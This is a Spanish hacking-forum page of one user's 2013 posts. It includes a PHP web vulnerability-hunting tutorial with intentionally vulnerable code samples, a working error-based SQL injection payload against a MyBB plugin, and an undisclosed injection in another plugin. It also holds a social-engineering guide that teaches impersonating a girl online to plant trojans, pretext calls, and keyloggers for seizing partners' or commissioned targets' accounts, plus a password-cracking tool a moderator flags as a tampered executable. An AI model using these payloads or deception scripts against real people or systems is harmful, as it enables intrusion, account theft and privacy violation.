elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Seguridad / Re: Cómo pudieron hackear mi sitio web? en: 7 Febrero 2013, 22:13 pm
Si como dices tu web estaba basada en wordpress, es muy posible que usasen este metodo:  http://foro.elhacker.net/seguridad/como_penetrar_un_blog_o_una_web_basados_en_wordpress-t380089.0.html
2  Seguridad Informática / Seguridad / Re: El Arte de encontrar 0-days en Aplicaciones Webs en: 28 Enero 2013, 22:07 pm
Veo que no soy bienvenido en este foro, así que haré lo que debí hacer, adios y que os vaya bien.
3  Seguridad Informática / Seguridad / Re: Crackear MD5 por fuerza bruta en: 28 Enero 2013, 20:18 pm
Anda campeón, vete a hacerle la comida al moder que ya sabes como. Adios.
4  Seguridad Informática / Seguridad / Re: Crackear MD5 por fuerza bruta en: 28 Enero 2013, 20:13 pm
Muy sencillo, informar de lo que hay, ¿te parece mal? ¿o es que no encuentras la forma de caer bien a algún moderador? Por cierto, mirando tus mensajes no ví nada de nada. Saludos.
5  Seguridad Informática / Seguridad / Re: Crackear MD5 por fuerza bruta en: 28 Enero 2013, 20:02 pm
señor moderador, ¿tienes algún problema con que se suban las cosas a virus total? Además, ¿no se fijó usted en que se mencionarón las fuentes?. Andé por favor, aporte algo. Saludos.
6  Seguridad Informática / Seguridad / El Arte de encontrar 0-days en Aplicaciones Webs en: 28 Enero 2013, 14:30 pm

 Esta vez, vamos a ver algo sobre 0-days, gracias a un amigo con el seudónimo Join7 del foro ZentrixPlus donde ha realizado un tutorial en la cual explica detalladamente como encontrar 0-days en aplicaciones webs.

Antes de empezar con el tutorial, es necesario contar con conocimientos básicos de PHP y MySQL como también sobre algunas vulnerabilidades comunes y la forma en que funcionan. Resaltar que no es necesario ser un programador profesional, solo basta con ser capaz de leer y entender PHP.

Si aun no cuenta con un pequeño conocimiento sobre PHP y necesita aprender lo básico para que pueda entender este tutorial, puede ingresar a los siguientes tutoriales:


Tutorial PHP:

    http://php.net/manual/en/tutorial.php

Tutorial MySQL:

    http://dev.mysql.com/doc/refman/5.0/en/tutorial.html

Vulnerabilidades:

    https://www.owasp.org/index.php/Category:Attack


1.- CREACIÓN DE UN ENTORNO DE AUDITORIA:

¿Por qué utilizar un entorno de Auditoria?

Simplemente se puede descargar el código que deseemos auditar, seguidamente se puede analizar el código utilizando un editor de texto en busca de vulnerabilidades.

Esto no es preferible, ya que hay una posibilidad muy alta de que falten cosas y seguramente tomará mucho más tiempo que mediante el uso de un entorno de Auditoria.

Web Server:

Queremos crear un servidor web donde podremos subir y probar las aplicaciones PHP, en estos casos se puede utilizar XAMPP o cualquier otro sistema que permita analizar estas aplicaciones localmente.

Es muy recomendable probar y analizar el posible código vulnerable en este servidor web (XAMPP) o en una red de confianza.

¿Que es lo que vamos a Auditar?

Ahora, cuando tenemos nuestro servidor creado tenemos que instalar cosas adicionales como WordPress, Joomla, MyBB o similares, dependiendo de lo realmente queremos auditar.

Si en estos casos vamos por un CMS independiente o simplemente una aplicación PHP que no, por supuesto, necesitamos algunos de los anteriores, pero es probable que en algún momento del tiempo pase a un blog de WordPress o un foro MyBB.

Seguidamente se mostraran los enlaces de descarga y alguna información sobre la forma de instalar algun CMS en particular:

MyBB

Descarga: http://www.mybb.com/downloads
Guía de Instalación: http://docs.mybb.com/Installing.html



 WordPress

Descarga: http://wordpress.org/download/
Guía de Instalación: http://codex.wordpress.org/Installing_WordPress



 Joomla

Descarga: http://www.joomla.org/download.html
Guía de Instalación: http://www.joomla.org/about-joomla/getting-started.html



 SMF:

Descarga: http://download.simplemachines.org/
Guía de Instalación: http://wiki.simplemachines.org/smf/Installing



 2.- LO QUE DEBEMOS BUSCAR:

User input:

La mayoría de vulnerabilidades son posibles porque el programador del archivo php olvida la validacion de entrada. Esto ocurre mayormente con las vulnerabilidades de SQL Injection, Cross-Site Scripting, File Inclusion, Server Side Include, Code Injection, File Upload y muchos mas.

---------------------------------------------------------------------------------------------
$_GET
Un array asociativo de variables pasadas al script actual a través de los parámetros de URL.
http://php.net/manual/en/reserved.variables.get.php

$_POST
Un array asociativo de variables pasadas al script actual mediante el método HTTP POST
http://php.net/manual/en/reserved.variables.post.php

$_REQUEST
Una matriz asociativa que contiene por defecto el contenido de $ _GET, $ _POST y $ _COOKIE.
http://php.net/manual/en/reserved.variables.request.php

$_COOKIE
Un array asociativo de variables pasadas al script actual a través de cookies HTTP.
http://php.net/manual/en/reserved.variables.cookies.php

$_SERVER
$ _SERVER - $ HTTP_SERVER_VARS [obsoleta] - Información del servidor y entorno de ejecución.
http://php.net/manual/en/reserved.variables.server.php

$_FILES
Una matriz asociativa de artículos subidos al script actual a través del método HTTP POST.
http://php.net/manual/en/reserved.variables.files.php
---------------------------------------------------------------------------------------------

Posibles Funciones Vulnerables:

Sql Injection:

Ejemplo Vulnerable:

---------------------------------------------------------------------------------------------
$id = $_GET['id'];
$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );
---------------------------------------------------------------------------------------------

    mysql_*
    $db (Para MyBB, mira aquí para más información: http://docs.mybb.com/Plugins-Globals.html y http://docs.mybb.com/Database_Methods.html
    $wpdb (Para WordPress, mira aquí para más información: http://codex.wordpress.org/Class_Reference/wpdb


Existen un montón de posibilidades que las funciones de mysql sean vulnerables, para ello podemos echar un vistazo al siguiente link para obtener mas información sobre las funciones de MySql.

    http://se1.php.net/manual/en/ref.mysql.php


He aquí algunas funciones comunes que posiblemente sean vulnerables:

    mysql_db_query - Selecciona una base de datos y ejecuta una consulta sobre el mismo.
    mysql_fetch_array - Extrae la fila de resultado como una matriz asociativa, una matriz numérica o ambas.
    mysql_fetch_field - Obtener información de columna del resultado y regresar como un objeto.
    mysql_fetch_row - Devuelve una fila de resultado como una matriz enumerada.
    mysql_num_rows - Devuelve el número de filas en el resultado.
    mysql_result - Obtener datos de resultado.


File Inclusion:

Ejemplo Vulnerable:

---------------------------------------------------------------------------------------------
<?php

$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>
---------------------------------------------------------------------------------------------

    include()
    require()


Si la aplicación no restringe cómo incluir archivos que puede leer archivos locales y posiblemente ejecutar archivos desde un servidor remoto (si allow_url_fopen está habilitado).

Upload:

---------------------------------------------------------------------------------------------
<?php
$target_path = "uploads/";
$target_path = $target_path . basename($_FILES['uploadedfile']['name']);
if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file " . basename($_FILES['uploadedfile']['name']) . " has been uploaded";
} else {
echo "There was an error uploading the file, please try again!";
}
?>
---------------------------------------------------------------------------------------------

    $_FILES


Si la aplicación no restringe como se cargan los archivos, en estos casos se puede cargar y ejecutar cualquier tipo de archivos.

Code Execution:

---------------------------------------------------------------------------------------------
<?php
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
?>
---------------------------------------------------------------------------------------------

    passthru()
    system()
    eval()
    exec()



3.- HERRAMIENTAS ÚTILES, SCRIPTS Y TÉCNICAS:

Editores de Texto:

Sublime Text 2 es uno de los mejores Editores de Textos que existe, sus funcionalidades incluyen, pero no se limitan a destacar del sintaxis, la apertura de directorios como "Proyectos" (muy útil) y una función de búsqueda muy agradable.

Grep:

Grep es una utilidad de línea de comandos para la búsqueda de texto sin formato, para las líneas que coincidan con una expresión regular. Grep fue desarrollado originalmente para el sistema operativo Unix.

Grep es una herramienta muy útil cuando se trata de realizar auditorias hacia aplicaciones web. Supongamos que tenemos el siguiente código en app.php:

---------------------------------------------------------------------------------------------
<?php
$header = $_GET['header'];
if(isset($header))
{
include("headers/$header");
}
else
{
include("headers/standard.php");
}

$id = $_GET['id'];
$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );
?>
---------------------------------------------------------------------------------------------

Podríamos usar una línea de comandos:
---------------------------------------------------------------------------------------------
$ grep _GET app.php
---------------------------------------------------------------------------------------------

Salida:
---------------------------------------------------------------------------------------------
$header = $_GET['header'];
$id = $_GET['id'];
---------------------------------------------------------------------------------------------



 Encontrar funciones mysql_*:
---------------------------------------------------------------------------------------------
grep include app.php
---------------------------------------------------------------------------------------------

Salida:
---------------------------------------------------------------------------------------------
include("headers/$header");
include("headers/standard.php");
---------------------------------------------------------------------------------------------



 Ahora digamos que tenemos 3 aplicaciones PHP en una carpeta y queremos buscar la función include en todas ellas, entonces podríamos hacer algo como esto:
---------------------------------------------------------------------------------------------
grep include *.php
---------------------------------------------------------------------------------------------

Salida:
---------------------------------------------------------------------------------------------
app2.php: include("headers/$header");
app2.php: include("headers/standard.php");
app3.php: include("headers/$header");
app3.php: include("headers/standard.php");
app.php: include("headers/$header");
app.php: include("headers/standard.php");
---------------------------------------------------------------------------------------------



 Si queremos dar salida al número de línea, puede utilizar el argumento -n de esta manera:
---------------------------------------------------------------------------------------------
grep include *.php -n
---------------------------------------------------------------------------------------------

Salida:
---------------------------------------------------------------------------------------------
app2.php:5: include("headers/$header");
app2.php:9: include("headers/standard.php");
app3.php:5: include("headers/$header");
app3.php:9: include("headers/standard.php");
app.php:5: include("headers/$header");
app.php:9: include("headers/standard.php");
---------------------------------------------------------------------------------------------

Ahora queremos comprobar si las palabras 'SELECT' y 'FROM' se pueden encontrar:
---------------------------------------------------------------------------------------------
grep 'SELECT\|FROM' app.php -n
---------------------------------------------------------------------------------------------

Salida:
---------------------------------------------------------------------------------------------
13:$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );
---------------------------------------------------------------------------------------------



 Si queremos que coincida con una cadena e ignorar mayúsculas y minúsculas se utiliza el argumento -i:
---------------------------------------------------------------------------------------------
grep 'sEleCt\|FroM' app.php -n -i
---------------------------------------------------------------------------------------------

Salida:
---------------------------------------------------------------------------------------------
13:$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );
---------------------------------------------------------------------------------------------



 Algunas otras herramientas para auditar archivos php: http://www.hotscripts.com/blog/6-free-php-security-auditing-tools/

4.- AUDITORIA EN EL MUNDO REAL:

Vamos a echar un vistazo a un ejemplo del mundo real, un exploit público, y ver si podemos encontrar las vulnerabilidades:

MyBB DyMy User Agent SQL Injection:
http://www.exploit-db.com/exploits/23359/

Vamos a descargar la aplicación vulnerable y colocarlo en nuestra carpeta de plugins. Lo primero que debemos hacer es abrirlo en el Editor de texto:



 Ahora vamos a empezar con un poco de búsqueda básica para posibles funciones vulnerables y cosas similares:
---------------------------------------------------------------------------------------------
grep "\$_GET" dymy_ua.php -i -n
grep "\$_GET" dymy_ua.php -i -n
grep "mysql_" dymy_ua.php -i -n
grep "include" dymy_ua.php -i -n
---------------------------------------------------------------------------------------------

Salida:
Nada util.



 ¿Por qué no encontrar nada? ¿Estamos haciendo algo mal? La respuesta está en el código fuente, vamos a echar un vistazo:
---------------------------------------------------------------------------------------------
function dymy_ua_install()
{
global $db;

$db->write_query("ALTER TABLE ".TABLE_PREFIX."posts ADD `useragent` VARCHAR(255)");
}
---------------------------------------------------------------------------------------------

Si alguna vez has visto el codigo fuente de los plug-in de MyBB, echa un vistazo a los siguientes documentos para obtener una mejor comprensión de lo que está mal aquí:

    http://docs.mybb.com/Plugins-Globals.html
    http://docs.mybb.com/Database_Methods.html


Así que cuando estemos auditando Plugins MyBB tenemos que cambiar nuestros métodos de auditoría un poco.

Vamos a buscar $db, ya que se utiliza en Plugins MyBB para las interacciones de bases de datos. Volvamos a la terminal y probar algunas cosas nuevas.
---------------------------------------------------------------------------------------------
grep "\$db" dymy_ua.php -i -n
---------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------------
56: global $db;
58: $db->write_query("ALTER TABLE ".TABLE_PREFIX."posts ADD `useragent` VARCHAR(255)");
63: global $db;
65: if($db->field_exists("useragent", "posts"))
75: global $db;
77: $db->delete_query("templategroups", "title='DyMy User Agent Templates'");
78: $db->write_query("ALTER TABLE ".TABLE_PREFIX."posts DROP `useragent`");
83: global $db;
85: $q = $db->simple_select("templategroups", "COUNT(*) as count", "title = 'DyMy User Agent'");
86: $c = $db->fetch_field($q, "count");
87: $db->free_result($q);
95: $db->insert_query("templategroups", $ins);
101: "template" => $db->escape_string(' <img src="images/useragent/os/{$os}.png" alt="{$os}" title="{$os_name}">'),
106: $db->insert_query("templates", $ins);
111: "template" => $db->escape_string(' <img src="images/useragent/browser/{$browser}.png" alt="{$browser}" title="{$browser_name}">'),
116: $db->insert_query("templates", $ins);
125: global $db;
127: $db->delete_query("templates", "title IN('DyMyUserAgent_Postbit_OS', 'DyMyUserAgent_Postbit_Browser') AND sid='-2'");
------------------------------------------------------------------------------------------------------------------



 Como esto no es mucho lo que podemos manipular, vamos a ir a 127 líneas y ver qué pasa:

------------------------------------------------------------------------------------------------------------------
function dymy_ua_deactivate()
{
global $db;

$db->delete_query("templates", "title IN('DyMyUserAgent_Postbit_OS', 'DyMyUserAgent_Postbit_Browser') AND sid='-2'"); // Line 27

require_once MYBB_ROOT."/inc/adminfunctions_templates.php";
find_replace_templatesets('postbit',"#".preg_quote('{$post[\'icon_browser\']}{$post[\'icon_os\']}')."#",'',0);
find_replace_templatesets('postbit_classic',"#".preg_quote('{$post[\'icon_browser\']}{$post[\'icon_os\']}</td>')."#",'</td>',0);
}

function dymy_ua_dh_post_insert(&$data)
{
$useragent = $_SERVER ? $_SERVER['HTTP_USER_AGENT'] : $HTTP_SERVER_VARS['HTTP_USER_AGENT'];
$data->post_insert_data['useragent'] = $useragent;
$data->post_update_data['useragent'] = $useragent;
}

function dymy_ua_postbit(&$post)
{
global $templates;

if(isset($post['browser']) && isset($post['system']) && !empty($post['browser']) && !empty($post['system']) && empty($post['useragent']))
{
$os = str_ireplace("icon_", "", $post['system']);
$browser = str_ireplace("icon_", "", $post['browser']);
$browser = preg_replace("#^linux([a-z])#si", "$1", $browser);
}
...
------------------------------------------------------------------------------------------------------------------

En este nos damos cuenta de algo muy bonito, eche un vistazo a esto:

------------------------------------------------------------------------------------------------------------------
function dymy_ua_dh_post_insert(&$data)
{
$useragent = $_SERVER ? $_SERVER['HTTP_USER_AGENT'] : $HTTP_SERVER_VARS['HTTP_USER_AGENT'];
$data->post_insert_data['useragent'] = $useragent;
$data->post_update_data['useragent'] = $useragent;
}
------------------------------------------------------------------------------------------------------------------

Vemos aquí que la aplicación inserta el user_agent sin ningún tipo de desinfección. Vamos a encender nuestro foro MyBB en nuestro localhost y tratar de analizar estos datos.

Activar el plugin en tu panel de administración y luego ir a un hilo y despues usar el Live HTTP Headers.

Vamos a ver este lado de nuestro mensaje:



Así que ahora, vamos a tratar algunas pruebas básicas para ver si la vulnerabilidad de inyección SQL en realidad existe:




Ah, maravilloso! Ahora vamos a jugar un rato con él hasta que tengamos una consulta agradable para la inyección.

Después de algunas pruebas vamos a salir con esta consulta:

------------------------------------------------------------------------------------------------------------------
' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)B)); #
------------------------------------------------------------------------------------------------------------------



 5.- NUEVO 0-DAY - MyFlags MyBB plugins SQL Injection:

La vulnerabilidad de inyección SQL que existe en MyBB Plugin HM_My Country Flags:

http://mods.mybb.com/view/hm-my-country-flags

Cuando este plugins se activa un usuario puede ir a su panel de control y ver esto:



Cada vez que el usuario vea su nacionalidad se mostrará junto a sus mensajes:



 Abrimos Live HTTP Headers y pulsamos en el Pais, en las cabeceras HTTP Live copie la direccion URL (localhost/mybb/misc.php?action=hmflags&cnam=Belgium&pf=5') y pega esto en una nueva pestaña.

Ahora ponga un ' después el país:

http://localhost/mybb/misc.php?action=hmflags&cnam=Belgium'&pf=5

Salida:
------------------------------------------------------------------------------------------------------------------
MyBB has experienced an internal SQL error and cannot continue.

SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Belgium''' at line 1
Query:
SELECT * FROM mybb_users u LEFT JOIN mybb_usergroups g ON (u.usergroup=g.gid) LEFT JOIN mybb_userfields f ON (u.uid=f.ufid) WHERE fid5='Belgium''
------------------------------------------------------------------------------------------------------------------

Ajustar un poco y podrás averiguar que es unión basada con un montón de columnas:



 Espero que haya disfrutado de este tutorial y pueda ayudarte a encontrar vulnerabilidades 0-days en aplicaciones webs.

CRÉDITOS:
Publicado en : http://btshell.wordpress.com/

Autor: Join7
Website: http://zentrixplus.net/
Este tutorial ha sido extraido del blog de mi amigo calebbucker miembro de la comunidad cl-security: http://calebbucker.blogspot.com.es/
7  Seguridad Informática / Seguridad / Ingeniería Social en: 27 Enero 2013, 12:11 pm
Ingeniería Social

Introducción

"Usted puede tener la mejor tecnología, firewalls, sistemas de detección de ataques, dispositivos biométricos, etc. Lo único que se necesita es una llamada a un empleado desprevenido e ingresan sin más. Tienen todo en sus manos." Kevin Mitnick.

¿Qué es la ingeniería social?
Bajo el nombre de Ingeniería Social (literalmente traducido del inglés Social Engineering) ACCIONES O CONDUCTAS útiles para conseguir información de las personas cercanas a un sistema.

Es una disciplina que consiste, ni más ni menos en sacar información a otra persona sin que esta sé de cuenta de que te esta revelando "información sensible".

Con este curioso término se engloba una serie de tretas, artimañas y engaños elaborados cuyo fin es confundir al usuario o, peor todavía, lograr que comprometa seriamente la seguridad de sus sistemas.
Aprovecha sentimientos tan variados como curiosidad, la avaricia, el sexo, la compasión o el miedo, de esta forma se consigue el objetivo, una acción por parte del usuario.



El factor humano
•En el congreso "Access All Areas" de 1997, un conferenciante aseguraba:

"Aunque se dice que el único ordenador seguro es el que está desenchufado,
los amantes de la ingeniería social gustan responder que siempre se puede convencer a alguien para que lo enchufe.

El factor humano es el eslabón más débil de la seguridad informática. Y no hay un sólo ordenador en el mundo que no dependa de un ser humano, es una vulnerabilidad universal e independiente de la plataforma tecnológica".

Ingeniería social en los 80
•La gente era más inocente
•Las contraseñas más débiles
•Los sistemas más vulnerables
•Las leyes menos rigurosas

Ingeniería social en nuestros tiempos
•CASO 1:Practicando en casa
CHAT-IRC-CANAL-LESBIANAS-Objetivo-conseguir videoconferencia con una lesbiana.
Materiales: Capturadora de video, Ingeniería social, webcam

•Caso 2: Seguir jugando:
Nos damos de alta una cuenta en hotmail, con nombre de chica
Creamos un perfil curioso
Entramos a los chats y damos nuestro mail
Somos la típica niña que recién se compró el ordenador y necesita
Ayuda (damos confianza, y aumentamos el ego de la victima
al ponerlo en el papel de nustro salvador, si le añadimos dulces
piropos y besos virtuales, en cuestión de tendremos lo que
buscamos, o estaremos en condiciones de
enviarle un troyano que nos abra de par en par su ordenador, una vez
conocido su sistema.



•Ética ??
* Recomendado leer “El gran Juego”
Justificaciones:
El espía y el detective>>> es su trabajo.
El gobierno >>>> por la seguridad de la nación.
El timador >>>> su medio de vida (la pasta)
El hacker >>>> curiosidad?!!!

•Ordenando la información:
Al igual que al preparar un ataque a un sistema informático.Versión, bug, etc.

Vamos elaborando una lista, sobre nuestro objetivo.

Gustos, vicios, marca de cigarrillos, matrícula del coche, modelo, móvil, DNI, nombre de los hijos, de la mujer, de la novia, figuras principales de en su vida, se elabora un perfil psicológico de la persona.

Fuente: Internet, basura, amigos, familiares, buscar siempre las personas mayores, abuelas, o niños, hijos, hermanos, etc.

Preparando la estrategia
•Todo objetivo se vale de una estrategia para lograrlo. Ese es el fin mismo de la estrategia.
•Antes debemos:
SABER, QUERER Y PODER hacerlo.

La ingeniería social por excelencia
•Ahora estamos preparados para poner la trampa. Conocemos todo de nuestra víctima, y podemos predecir como actuará frente a determinados estímulos.
•Conocemos sus gustos sus deseos, y es fácil llevarlo por una conversación telefónica a donde queremos.

•¿Hola, Raúl Pérez Padilla?
•Le hablamos del servicio de marketing de TUFONICA, estamos ofreciendo una promoción especial a nuestros mejores clientes. Consiste en que las llamadas a un número fijo nacional de su elección, serán gratis durante un año sin tener que pagar nada.
•Por favor, para poder hacer esto posible necesitamos que nos confirme una serie de datos….
•-…….

•Mi experiencia como comercial deAUNA CABLE o INSTALADOR ADSL
¿Que logramos con esto?
Entrar a una casa, nuestra víctima quizás.
EJEMPLO: Llamada a nuestro móvil, nuestro jefe, necesitamos enviar un dato urgente, no nos dejaría el ordenador para enviarlo?



IS COMO PIEZA DE UN PUZZLE MORTAL
Mezclar la IS con la tecnología hace que el conjunto en sí, sea
un arma mortal, crear un keylog, o un troyano en VB, o C++,
No requiere un gran esfuerzo, incluso el control total de Pelé, tardó tiempo en ser reconocido por los principales antivirus.

CD de regalos, archivos adjuntos, echar imaginación.
Quién no compraría el último Cd de nuestro cantante favorito
Por 1€a un tio que monto una manta en la puerta de nuestra casa, como caído del cielo. ???

•Pistas:
Si nos hacemos pasar por técnicos, hablar en lenguaje técnico, la gente suele no entender nada y decirnos siempre que si.
Encuestas inocentes a los familiares de las victimas, edades, nombres, etc. (Hacer unas cuantas para tener soltura).
Oferta increíble enviaremos la ampliación por mail (ahí introducimos el troyano). Es un mail esperado, lo abrirá seguro.



•Si analizamos el problema, vemos que lo que queremos es una cuenta en concreto.
•Si es de nuestra novia/o (esta tirado), un compañero o amigo, virtual o no (tirado también), de una persona por encargo.(Requiere un proceso fino de ingeniera social, objetivo, un keylog, y acceder 2 veces al ordenador) por ejemplo.
ÉTICA? >>VIOLACIÓN DE LA PRIVACIDAD?>>> ????

Links de formas de hackear hotmail.
http://usuarios.lycos.es/unsafebytes/hackearhotmail.htm
http://www.comunidadcmx.com/index.php



Conclusiones:
La ingeniería social NUNCA PASARÁ DE MODA.
Es un arte, el arte que deja la ética de ladoEl ingrediente necesario detrás de todo gran ataque.

Tu red tiene firewall?. .Tiene antivirus???Tus administradores estan entrenados para hablarcon hackers y detectar sus intentos de ingenieríasocial?

Y María la de la limpieza?
¿Ella también está preparada...?


Contramedidas
La mejor manera de esta protegido pasa por el conocimiento.
•Educar a las personas, en concreto a las personas que trabajan cerca de las terminales, desde los operarios, hasta personal de limpieza.
•Analizar con antivirus todo los correos que reciban
•No informar telefónicamente de las características técnicas de la red, ni nombre de personal a cargo, etc.
•Control de acceso físico al sitio donde se encuentra los ordenadores.
•Políticas de seguridad a nivel de Sistema Operativo.


Fuente:  Adrián Ramírez Expuesto en http://btshell.wordpress.com
Eso es todo.
8  Seguridad Informática / Seguridad / Crackear MD5 por fuerza bruta en: 26 Enero 2013, 11:38 am
Hola a todos, hoy os traigo un programa hecho por BECKS. También mencionar que este programa lo he sacado de la comunidad cl-security.

Este programa se utiliza para realizar ataques de fuerza bruta con diccionarios una vez los desencriptadores online de MD5 fallan y no nos da la contraseña.

Su uso es bastante sencillo y trae consigo un generador de diccionarios para generar los diccionarios a nuestro antojo o necesidades.

sin más os dejo las imagenes y el enlace de descarga del mismo.









Descarga: NO DISPONIBLE El link lo he guardado.
contraseña: gracias_BTshell

ESO ES TODO.

Modificado por r32:
No es todo... porqué modificas el ejecutable original, cambiandole icono  :huh:, lo bloqueas  :huh: para que, con modificar la extensión .ex_ ya puedes ver "entre comillas" lo que quieras.

Esperemos no haga conexiones, ya hablaremos BTshell.

Crees que le hará gracia a Destroyer ???
9  Seguridad Informática / Seguridad / Re: crackear gmail o hotmail por fuerza bruta en: 20 Enero 2013, 22:48 pm
corax
  Adios.



[MOD] Texto editado para eliminar los insultos proferidos.
10  Seguridad Informática / Seguridad / Re: crackear gmail o hotmail por fuerza bruta en: 20 Enero 2013, 17:30 pm
para empezar no son la primeras 20, pero si te parece una tonteria solo tienes que reportar el post. saludos.
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines